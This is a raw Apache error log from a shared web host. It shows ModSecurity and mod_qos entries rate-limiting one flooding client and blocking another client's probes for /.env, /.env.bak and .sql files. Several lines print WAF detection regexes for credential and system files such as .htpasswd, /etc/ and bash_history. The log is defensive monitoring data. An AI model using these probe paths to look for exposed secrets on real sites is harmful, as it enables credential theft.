[Tue May 26 19:55:02.391992 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKNwAAAPY"]
[Tue May 26 19:55:02.396536 2026] [security2:error] [pid 86490:tid 86622] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKKwAAAIc"]
[Tue May 26 19:55:02.402745 2026] [security2:error] [pid 86490:tid 86704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKMQAAANk"]
[Tue May 26 19:55:02.409334 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPGDRMqfxdEDkoszVegAAABw"]
[Tue May 26 19:55:02.410788 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPEqK9k_ZUB2Vp25N9AAAAec"]
[Tue May 26 19:55:02.413844 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKNAAAAMo"]
[Tue May 26 19:55:02.420888 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVnwAAADo"]
[Tue May 26 19:55:02.442637 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVoQAAAA4"]
[Tue May 26 19:55:02.445416 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVngAAACg"]
[Tue May 26 19:55:02.447048 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVqAAAAFo"]
[Tue May 26 19:55:02.448509 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVpwAAACs"]
[Tue May 26 19:55:02.515244 2026] [security2:error] [pid 86490:tid 86665] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stg/.env.bak"] [unique_id "ahWtPlZMwN0DpLVWo6LKZAAAALI"]
[Tue May 26 19:55:02.570425 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPkqK9k_ZUB2Vp25OZwAAAcY
[Tue May 26 19:55:02.571096 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPmDRMqfxdEDkoszV4gAAABQ
[Tue May 26 19:55:02.579727 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPmDRMqfxdEDkoszV5gAAACE
[Tue May 26 19:55:02.579933 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPkqK9k_ZUB2Vp25OawAAAZY
[Tue May 26 19:55:02.580860 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPmDRMqfxdEDkoszV5wAAAE0
[Tue May 26 19:55:02.581115 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKeAAAAJ8
[Tue May 26 19:55:02.598846 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV6gAAAAg
[Tue May 26 19:55:02.600688 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25ObgAAAdk
[Tue May 26 19:55:02.603340 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPmDRMqfxdEDkoszV7AAAAHU
[Tue May 26 19:55:02.676830 2026] [security2:error] [pid 86490:tid 86633] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/main.sql"] [unique_id "ahWtPlZMwN0DpLVWo6LKeQAAAJI"]
[Tue May 26 19:55:02.683008 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25ObwAAAgE
[Tue May 26 19:55:02.723764 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKegAAAPE
[Tue May 26 19:55:02.724534 2026] [qos:error] [pid 93868:tid 94382] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OcAAAAgs
[Tue May 26 19:55:02.730392 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKewAAAN4
[Tue May 26 19:55:02.735519 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OcQAAAbI
[Tue May 26 19:55:02.735766 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKfAAAAIU
[Tue May 26 19:55:02.737490 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV8QAAAGY
[Tue May 26 19:55:02.748977 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV8gAAACQ
[Tue May 26 19:55:02.752910 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV8wAAAD8
[Tue May 26 19:55:02.754108 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OcwAAAd4
[Tue May 26 19:55:02.834482 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:43462] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV9gAAADM
[Tue May 26 19:55:02.835475 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OdAAAAf4
[Tue May 26 19:55:02.867963 2026] [security2:error] [pid 93868:tid 94352] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25ONQAAAe0"]
[Tue May 26 19:55:02.876115 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKfwAAAJ4
[Tue May 26 19:55:02.876564 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OdQAAAdE
[Tue May 26 19:55:02.880068 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKgAAAAPs
[Tue May 26 19:55:02.887609 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPlZMwN0DpLVWo6LKgQAAAJs
[Tue May 26 19:55:02.887657 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OdgAAAZQ
[Tue May 26 19:55:02.891971 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV9wAAAEc
[Tue May 26 19:55:02.898481 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV-AAAAFA
[Tue May 26 19:55:02.902379 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV-QAAACA
[Tue May 26 19:55:02.909818 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OdwAAAew
[Tue May 26 19:55:02.985853 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:43462] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPmDRMqfxdEDkoszV-gAAAAw
[Tue May 26 19:55:02.987731 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPkqK9k_ZUB2Vp25OeAAAAao
[Tue May 26 19:55:03.028035 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP1ZMwN0DpLVWo6LKggAAAOU
[Tue May 26 19:55:03.028283 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP0qK9k_ZUB2Vp25OeQAAAaQ
[Tue May 26 19:55:03.030221 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP1ZMwN0DpLVWo6LKgwAAAKk
[Tue May 26 19:55:03.039063 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP0qK9k_ZUB2Vp25OegAAAbY
[Tue May 26 19:55:03.042511 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP1ZMwN0DpLVWo6LKhAAAAPM
[Tue May 26 19:55:03.045990 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP2DRMqfxdEDkoszV-wAAAHk
[Tue May 26 19:55:03.051811 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP2DRMqfxdEDkoszV_AAAAC4
[Tue May 26 19:55:03.053451 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP2DRMqfxdEDkoszV_QAAAFU
[Tue May 26 19:55:03.063640 2026] [qos:error] [pid 93868:tid 94348] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP0qK9k_ZUB2Vp25OewAAAek
[Tue May 26 19:55:03.104598 2026] [security2:error] [pid 93868:tid 94364] [client 113.15.120.63:22617] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "worldwidecourier.co.in"] [uri "/wp-comments-post.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OcgAAAfk"]
[Tue May 26 19:55:03.133054 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:43462] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP2DRMqfxdEDkoszV_wAAAGw
[Tue May 26 19:55:03.139492 2026] [qos:error] [pid 93868:tid 94268] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP0qK9k_ZUB2Vp25OfAAAAZk
[Tue May 26 19:55:03.180619 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP1ZMwN0DpLVWo6LKhwAAAP4
[Tue May 26 19:55:03.180824 2026] [qos:error] [pid 93868:tid 94377] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP0qK9k_ZUB2Vp25OfgAAAgY
[Tue May 26 19:55:03.181562 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP1ZMwN0DpLVWo6LKiAAAAOQ
[Tue May 26 19:55:03.192141 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP0qK9k_ZUB2Vp25OfwAAAa8
[Tue May 26 19:55:03.197341 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP1ZMwN0DpLVWo6LKiwAAAK4
[Tue May 26 19:55:03.199957 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP2DRMqfxdEDkoszWAAAAAGc
[Tue May 26 19:55:03.200948 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP2DRMqfxdEDkoszWAQAAAH4
[Tue May 26 19:55:03.202718 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP2DRMqfxdEDkoszWAgAAAFs
[Tue May 26 19:55:03.217516 2026] [qos:error] [pid 93868:tid 94303] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtP0qK9k_ZUB2Vp25OgAAAAbw
[Tue May 26 19:55:03.262427 2026] [security2:error] [pid 86490:tid 86664] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/strapi/.env"] [unique_id "ahWtP1ZMwN0DpLVWo6LKjgAAALE"]
[Tue May 26 19:55:03.277579 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPUqK9k_ZUB2Vp25OFAAAAgI"]
[Tue May 26 19:55:03.279108 2026] [security2:error] [pid 86490:tid 86692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKHQAAAM0"]
[Tue May 26 19:55:03.284163 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKQwAAAOA"]
[Tue May 26 19:55:03.286325 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKQAAAAOM"]
[Tue May 26 19:55:03.299086 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPUqK9k_ZUB2Vp25OFQAAAaE"]
[Tue May 26 19:55:03.304288 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVvAAAACk"]
[Tue May 26 19:55:03.316065 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPUqK9k_ZUB2Vp25OGwAAAgA"]
[Tue May 26 19:55:03.320644 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPUqK9k_ZUB2Vp25OEAAAAg0"]
[Tue May 26 19:55:03.322886 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKRQAAAPA"]
[Tue May 26 19:55:03.336719 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPUqK9k_ZUB2Vp25OHgAAAeg"]
[Tue May 26 19:55:03.339754 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKLgAAALg"]
[Tue May 26 19:55:03.358021 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPUqK9k_ZUB2Vp25OHQAAAcI"]
[Tue May 26 19:55:03.363360 2026] [security2:error] [pid 93868:tid 94338] [client 43.173.181.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OMwAAAd8"]
[Tue May 26 19:55:03.364457 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVwwAAAFE"]
[Tue May 26 19:55:03.364847 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVtAAAAAE"]
[Tue May 26 19:55:03.374697 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25ORAAAAeE"]
[Tue May 26 19:55:03.378872 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV0wAAACY"]
[Tue May 26 19:55:03.391618 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPVZMwN0DpLVWo6LKRAAAANE"]
[Tue May 26 19:55:03.394955 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVsQAAAGM"]
[Tue May 26 19:55:03.406979 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVvQAAAEQ"]
[Tue May 26 19:55:03.409267 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OTQAAAgw"]
